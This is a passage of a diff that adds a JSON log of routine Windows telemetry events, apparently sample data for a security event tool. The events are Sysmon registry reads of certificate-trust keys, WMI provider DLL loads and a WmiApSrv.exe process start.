"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 
131883573480420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573480420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573480420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + 
"registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573480420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573480420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573480420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573480420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573480420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573480420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573480420000, 
+ "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573480420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573480420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573480420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573480420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + 
"process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573480420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + 
"timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": 
"registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "winsta.dll", + "image_path": "C:\\Windows\\System32\\winsta.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "image_load", + "image_name": "utildll.dll", + "image_path": "C:\\Windows\\System32\\utildll.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573480580000, + 
"unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "image_load", + "image_name": "setupapi.dll", + "image_path": "C:\\Windows\\System32\\setupapi.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573480580000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "image_load", + "image_name": "srvcli.dll", + "image_path": "C:\\Windows\\System32\\srvcli.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573480730000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "image_load", + "image_name": "samcli.dll", + "image_path": "C:\\Windows\\System32\\samcli.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573480730000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "image_load", + "image_name": "logoncli.dll", + "image_path": "C:\\Windows\\System32\\logoncli.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573480730000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573480730000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "command_line": "C:\\WINDOWS\\system32\\wbem\\WmiApSrv.exe", + "event_type": "process", + "logon_id": 999, + 
"parent_process_name": "services.exe", + "parent_process_path": "C:\\Windows\\System32\\services.exe", + "pid": 7720, + "ppid": 568, + "process_name": "WmiApSrv.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiApSrv.exe", + "subtype": "create", + "timestamp": 131883573480880000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-0010C1475501}", + "unique_ppid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}", + "user": "NT AUTHORITY\\SYSTEM", + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 
131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573480890000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 